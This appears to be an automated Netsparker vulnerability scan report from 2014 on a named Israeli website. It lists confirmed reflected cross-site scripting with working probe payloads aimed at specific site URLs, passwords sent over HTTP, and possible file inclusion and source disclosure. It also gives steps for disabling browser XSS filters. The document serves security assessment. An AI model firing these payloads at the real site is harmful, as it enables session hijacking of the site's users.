Page 1

NETSPARKER SCAN REPORT SUMMARY TARGET URL http://www.tariel.co.il/ SCAN DATE 26 17:32:51 2014 ‫וו‬ REPORT DATE 26 18:37:54 2014 ‫וו‬ SCAN DURATION 01:05:03

Total Requests 10888

Average Speed

2.79 req/sec.

21 10 0 5

identified

confirmed

SCAN SETTINGS ENABLED Static Tests, Find Backup Files, SQL ENGINES Injection, Boolean SQL Injection, Blind SQL Injection, Cross-site Scripting, Command Injection, Blind Command Injection, Local File Inclusion, Remote File Inclusion, Remote Code Evaluation, HTTP Header Injection, Open Redirection, Expression Language Injection

Authentication Scheduled

critical

informational

VULNERABILITIES IMPORTANT

33% MEDIUM

33% LOW 10%

INFORMATION

24%

1 / 21


VULNERABILITY SUMMARY URL

Parameter

Method

Vulnerability

Confirmed

/

ArticleID

GET

Cross-site Scripting

Yes

Query Based

Query String

Cross-site Scripting

Yes

ArticleID

GET

Cross-site Scripting

Yes

Password Transmitted Over HTTP

Yes

[Possible] Local File Inclusion

No

[Possible] ColdFusion Source Code Disclosure

No

Auto Complete Enabled

Yes

Cookie Not Marked As HttpOnly

Yes

E-mail Address Disclosure

No

/_Uploads/dbsBanners/

Forbidden Resource

Yes

/hanacha

[Possible] ColdFusion Source Code Disclosure

No

/katavim

[Possible] ColdFusion Source Code Disclosure

No

/komuna

[Possible] ColdFusion Source Code Disclosure

No

/megazin

[Possible] ColdFusion Source Code Disclosure

No

/melia

[Possible] ColdFusion Source Code Disclosure

No

/new/

Basic Authentication over Clear Text

Yes

/robots.txt

Robots.txt Identified

Yes

/shamaim

[Possible] ColdFusion Source Code Disclosure

No

/sitemap.xml

IIS Version Disclosure

No

Sitemap Identified

No

Cross-site Scripting

Yes

/ViewImage.asp

Image

GET

2 / 21


1. Cross-site Scripting XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

4 TOTAL IMPORTANT CONFIRMED

4

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application. {PRODUCT} detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact There are many different attacks that can be leveraged through the use of cross-site scripting, including: Hijacking user's active session. Mounting phishing attacks. Intercepting data and performing man-in-the-middle attacks.

Remedy The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

Remedy References Microsoft Anti-XSS Library OWASP XSS Prevention Cheat Sheet OWASP AntiSamy Java

External References XSS Cheat Sheet OWASP - cross-site scripting XSS Shell XSS Tunnelling

Proof of Concept Notes Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that; XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than testing purposes. Even though browsers have certain checks to prevent Cross-site scripting attacks in practice there are a variety of ways to bypass this mechanism therefore a web application should not rely on this kind of client-side browser checks. Chrome Open command prompt. Go to folder where chrome.exe is located. Run the command chrome.exe --args --disable-xss-auditor Internet Explorer Click Tools->Internet Options and then navigate to the Security Tab. Click Custom level and scroll towards the bottom where you will find that Enable XSS filter is currently Enabled. Set it to disabled. Click OK. Click Yes to accept the warning followed by Apply. Firefox Go to about:config in the URL address bar. In the search field, type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.

Classification OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08 3 / 21


1.1. /ViewImage.asp CONFIRMED http://www.tariel.co.il/ViewImage.asp?Image=javascript:alert(0x000246)

Parameters Parameter

Type

Value

Image

GET

javascript:alert(0x000246)

Request GET /ViewImage.asp?Image=javascript:netsparker(0x000246) HTTP/1.1 Referer: http://www.tariel.co.il/_JS/Funclib.js Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32; CustomerPassword=51%5F; CustomerMail=190%5F247%5F189%5F4%5F15%5F235%5F215%5F127%5F55%5F13%5F0%5F97%5F37%5F68%5F149%5F70%5F203%5F195%5F178%5F245%5F162%5F126%5F Accept-Encoding: gzip, deflate

Response HTTP/1.1 200 OK Date: Mon, 26 May 2014 15:12:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 1685 Content-Type: text/html; Charset=UTF-8 Cache-control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Expires: Tue, 01 Jan 1971 02:00:00 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="he"> <head> <title> ‫י ה והוו‬ ‫< י‬/title> <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8"> <base href="http://www.tariel.co.il/"/> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site/modFormValidatorHU.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/dbsAjax.js"></script> <script type="text/javascript" language="javascript"> var sAppDomain = "http://www.tariel.co.il"; </script> <link rel="STYLESHEET" type="text/css" href="http://www.tariel.co.il/_Pics/Grid_0/main.css"> <link rel="STYLESHEET" type="text/css" href="_Pics/Common/content.css"> </head> <body onLoad="focus();" class="Popup"> <table cellpadding="0" cellspacing="0" align="center"> <tr> <td><br></td> </tr> <tr> <td style="border: 2px solid #FFFFFF;"><img src="javascript:netsparker(0x000246)" alt="" width="800" style="border: 1px solid #000000;"><div class="FullImgCaption"></div> </td> </tr> <tr> <td dir="rtl" align="left" height="36" valign="middle" class="dont_print">&nbsp;<input type="Button" onclick="self.close();" class="button" style="width:70px;" value="‫הויה‬ ‫ " י‬title=" ‫י‬ ‫ "הויה‬class="button">&nbsp;&nbsp;&nbsp;&nbsp;<input type="Button" style="width:70px;" onclick="self.print();" class="button" value="‫ה‬ " title="‫ה‬ ">&nbsp;</td> </tr> </table><br> </body> </html>

1.2. / CONFIRMED http://www.tariel.co.il/?CategoryID=2545&ArticleID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters Parameter

Type

Value

CategoryID

GET

2545

ArticleID

GET

'"--></style></script> <script>alert(0x000110)</script>

dbsAuthToken

GET

3

4 / 21


Request GET /?CategoryID=2545&ArticleID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000110)%3C/script%3E&dbsAuthToken=3 HTTP/1.1 Referer: http://www.tariel.co.il/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32 Accept-Encoding: gzip, deflate

Response … .il/"> <meta name="keywords" content=""> <meta name="description" content=" ‫ו וכ כוו ה‬ ‫ו יבוי‬ ‫>" ו יוי בו‬ <link rel="canonical" href="http://www.tariel.co.il/?categoryid=2545&articleid='"--></style></script><script>netsparker(0x000110)</script>" /> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site …

1.3. / CONFIRMED http://www.tariel.co.il/?"></script><script>alert(9)</script>

Parameters Parameter

Type

'"--></style></script> <script>netsparker(0x000020)</script>

GET

Query Based

Query String

Value

"></script><script>alert(9)</script>

Request GET /?"></script><script>netsparker(9)</script> HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32 Accept-Encoding: gzip, deflate

Response … p;</span> <a href="?pg=subscribe&amp;CategoryID=754">

‫< הי‬/a>

</p> <input type="hidden" name="CatID" value="0"> <input type="hidden" name="PathInfo" value=""></script><script>netsparker(9)</script>"> </form> </div> </div> <div class="NavigationBarSM NavigationBarSMbyID1"><ul id="Menu1" class="MM1"> <li class="NavigationHorizontalFirst Navigat …

1.4. / CONFIRMED http://www.tariel.co.il/?CategoryID=1797&ArticleID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters Parameter

Type

Value

CategoryID

GET

1797

ArticleID

GET

'"--></style></script> <script>alert(0x0003AB)</script>

KeyWords

GET

3

SearchCategory

GET

3

SearchPage

GET

3

5 / 21


Request GET /?CategoryID=1797&ArticleID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003AB)%3C/script%3E&KeyWords=3&SearchCategory=3&SearchPage=3 HTTP/1.1 Referer: http://www.tariel.co.il/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32; CustomerPassword=51%5F; CustomerMail=190%5F247%5F189%5F4%5F15%5F235%5F215%5F127%5F55%5F13%5F0%5F97%5F37%5F68%5F149%5F70%5F203%5F195%5F178%5F245%5F162%5F126%5F Accept-Encoding: gzip, deflate

Response … =""> <meta name="description" content="‫י ם וו ווכ י ו הוכ‬ ‫והוו‬ ‫י‬ ‫כהו‬ ‫ יהי וכ י‬:‫ייו‬ ‫י ו‬ ‫כם ויהו‬."> <link rel="canonical" href="http://www.tariel.co.il/?categoryid=1797&articleid='"--></style></script><script>netsparker(0x0003ab)</script>" /> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site …

6 / 21


2. Basic Authentication over Clear Text Netsparker identified that the application is using Basic Authentication over HTTP. Basic Authentication sends username and password in plain text. {PRODUCT} identified that the application is using basic authentication over HTTP. Basic authentication sends username and password in plain text. Generally, using basic authentication is not a good solution.

1 TOTAL IMPORTANT CONFIRMED

1

Impact If an attacker can intercept traffic on the network, he/she might be able to steal the user's credentials.

Actions to Take 1. See the remedy for solution. 2. Move all of your directories which require authentication to be served only over HTTPS, and disable any access to these pages over HTTP.

Classification OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-319 CAPEC-65 WASC-04

2.1. /new/ CONFIRMED http://www.tariel.co.il/new/?CategoryID=1680&SubjectID=&TitleSearchString=%D7%A4%D7%95%D7%9C%D7%90%D..

Request GET /new/?CategoryID=1680&SubjectID=&TitleSearchString=%D7%A4%D7%95%D7%9C%D7%90%D7%A8%D7%93&Action=%D7%97%D7%25 HTTP/1.1 Referer: http://www.tariel.co.il/?CategoryID=605&dbsRW=1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32 Accept-Encoding: gzip, deflate

Response HTTP/1.1 401 Unauthorized Content-Length: 1656 Content-Type: text/html Server: Microsoft-IIS/6.0 WWW-Authenticate: Basic realm="Please enter user and password" X-Powered-By: ASP.NET Date: Mon, 26 May 2014 14:35:37 GMT Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Expires: Tue, 01 Jan 1971 02:00:00 GMT <!DOCTYPE HTML â&#x20AC;Ś

7 / 21


3. Password Transmitted Over HTTP Netsparker identified that password data is sent over HTTP. {PRODUCT} detected that password data is being transmitted over HTTP.

Impact

1 TOTAL IMPORTANT CONFIRMED

1

If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take 1. See the remedy for solution. 2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-319 CAPEC-65 WASC-04

3.1. / CONFIRMED http://www.tariel.co.il/?CategoryID=1797&ArticleID=4122&KeyWords=&SearchCategory=&SearchPage=

Form target action http://www.tariel.co.il/PostLogin.asp

Request GET /?CategoryID=1797&ArticleID=4122&KeyWords=&SearchCategory=&SearchPage= HTTP/1.1 Referer: http://www.tariel.co.il/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD Accept-Encoding: gzip, deflate

Response HTTP/1.1 200 OK Date: Mon, 26 May 2014 14:33:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 1015369 Content-Type: text/html; Charset=UTF-8 Cache-control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Expires: Tue, 01 Jan 1971 02:00:00 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="he"> <!-- Daronet DBS2004 12/03/2014 11:32:00 -->

<head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="index,follow"> <meta http-equiv="X-UA-Compatible" content="IE=7, IE=9"> <title>‫<םיהוכ‬/title> <base href="http://www.tariel.co.il/"> <meta name="keywords" content=""> <meta name="description" content=""> <link rel="canonical" href="http://www.tariel.co.il/?categoryid=1797&articleid=4122" /> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site/modFormValidatorHU.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/dbsAjax.js"></script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script> <script type="text/javascript" language="javascript"> var sAppDomain = "http://www.tariel.co.il"; var sRatingMsg = "‫והיות‬ ‫;" י‬ var sOneStarMsg = "1 ‫;"ביבכ‬ var sTwoStarsMsg = "2 ‫;"ביבכוכ‬ var sThreeStarsMsg = "3 ‫;"ביבכוכ‬ var sFourStarsMsg = "4 ‫;"ביבכוכ‬ var sFiveStarsMsg = "5 ‫;"ביבכוכ‬ var c_styles = {}; var c_menus = {}; var c_hideTimeout = 500; // 1000==1 second var c_subShowTimeout = 250; var c_keepHighlighted = true; var c_findCURRENT = false; // find the item linking to the current page and apply it the CURRENT st …

8 / 21


4. [Possible] Local File Inclusion

1 TOTAL IMPORTANT

A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. However this issue could not be confirmed by Netsparker. Netsparker believes that this was not a Local File Inclusion however there were some indications of a possible LFI. There can be numerous reasons for Netsparker not being able to confirm it. We strongly recommend you to investigate the issue manually. You can also consider sending us the details of this issue so we can address it for the next time and give you more precise results. {PRODUCT} identified a possible local file inclusion vulnerability, which occurs when a file from the target system is injected into the attacked server page. However, this issue could not be confirmed by {PRODUCT}. {PRODUCT} believes that this was not a local file inclusion, but there were some indications of a possible local file inclusion. There can be numerous reasons for {PRODUCT} not being able to confirm it. We strongly recommend you investigate the issue manually. You can also consider sending us the details of this issue so we can address it for the next time and give you more precise results.

Impact Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors, an attacker might carry out one or more of the following attacks: Gather usernames via /etc/passwd file Harvest useful information from the log files, such as "/apache/logs/error.log" or "/apache/logs/access.log" Remotely execute commands via combining this vulnerability with some of other attack vectors, such as file upload vulnerability or log injection

Remedy If possible, do not permit file paths to be appended directly. Make them hard-coded or selectable from a limited hard-coded path list via an index variable. If you definitely need dynamic path concatenation, ensure you only accept required characters such as "a-Z0-9" and do not allow ".." or "/" or "%00" (null byte) or any other similar unexpected characters. It's important to limit the API to allow inclusion only from a directory and directories below it. This ensures that any potential attack cannot perform a directory traversal attack.

Classification OWASP A4 PCI v1.2-6.5.4 PCI v2.0-6.5.1 CWE-98 CAPEC-251 WASC-33

4.1. / http://www.tariel.co.il/?3

Certainty Request GET /?3 HTTP/1.1 Referer: http://www.tariel.co.il/PostLogin.asp Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32; CustomerPassword=51%5F; CustomerMail=190%5F247%5F189%5F4%5F15%5F235%5F215%5F127%5F55%5F13%5F0%5F97%5F37%5F68%5F149%5F70%5F203%5F195%5F178%5F245%5F162%5F126%5F Accept-Encoding: gzip, deflate

Response â&#x20AC;Ś fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div class="separator clearfix"> <div class="sidebar align"> <div class="recent_forum recen â&#x20AC;Ś

9 / 21


5. [Possible] ColdFusion Source Code Disclosure Netsparker identified a web page that discloses ColdFusion (server side) source code. An attacker can obtain server side source code of the web application, which can contain sensitive data such as database connection strings, usernames and passwords along with the technical and business logic of the application.

7 TOTAL MEDIUM

{PRODUCT} identified possible source code disclosure (ColdFusion). An attacker can obtain server-side source code of the web application, which can contain sensitive data - such as database connection strings, usernames and passwords - along with the technical and business logic of the application.

Impact Depending on the source code, database connection strings, username, and passwords, the internal workings and the business logic of the application might be revealed. With such information, an attacker can mount the following types of attacks: Access the database or other data resources. Depending on the privileges of the account obtained from the source code, it may be possible to read, update or delete arbitrary data from the database. Gain access to password protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application. Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take 1. Confirm exactly what aspects of the source code are actually disclosed; due to the limitations of these types of vulnerability, it might not be possible to confirm this in all instances. Confirm this is not an intended functionality. 2. If it is a file required by the application, change its permissions to prevent public users from accessing it. If it is not, then remove it from the web server. 3. Ensure that the server has all the current security patches applied. 4. Remove all temporary and backup files from the web server.

Required Skills for Successful Exploitation This is dependent on the information obtained from the source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However, a highly skilled attacker could leverage this form of vulnerability to obtain account information from databases or administrative panels, ultimately leading to the control of the application or even the host the application resides on.

External References Secureyes - Source Code Disclosure over Http

Classification PCI v1.2-6.5.6 PCI v2.0-6.5.6 CWE-540 CAPEC-118 WASC-13

5.1. / http://www.tariel.co.il/

Certainty Request GET / HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Accept-Encoding: gzip, deflate Connection: Keep-Alive

Response â&#x20AC;Ś fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div class="separator clearfix"> <div class="sidebar align"> <div class="recent_forum recen â&#x20AC;Ś

10 / 21


5.2. /melia http://www.tariel.co.il/melia

Certainty Request GET /melia HTTP/1.1 Referer: http://www.tariel.co.il/CategoriesMap.xml Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32 Accept-Encoding: gzip, deflate

Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div id="ctlContent"><a name="dbsPgCnt"></a><div id="Body0"> <script type="text/javascript" language="javascript"> var nInterval; $(document).ready(function() { //Show Banner $(".main_ima …

5.3. /katavim http://www.tariel.co.il/katavim

Certainty Request GET /katavim HTTP/1.1 Referer: http://www.tariel.co.il/CategoriesMap.xml Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32 Accept-Encoding: gzip, deflate

Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div id="Footer" class="clearfix"> <div id="NavHorizontalSimpleByID685"><ul id="navlist685" class="NavigationBarSimple NavigationBarSimpleByID685"><li cla …

5.4. /hanacha http://www.tariel.co.il/hanacha

Certainty

11 / 21


Request GET /hanacha HTTP/1.1 Referer: http://www.tariel.co.il/CategoriesMap.xml Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32 Accept-Encoding: gzip, deflate

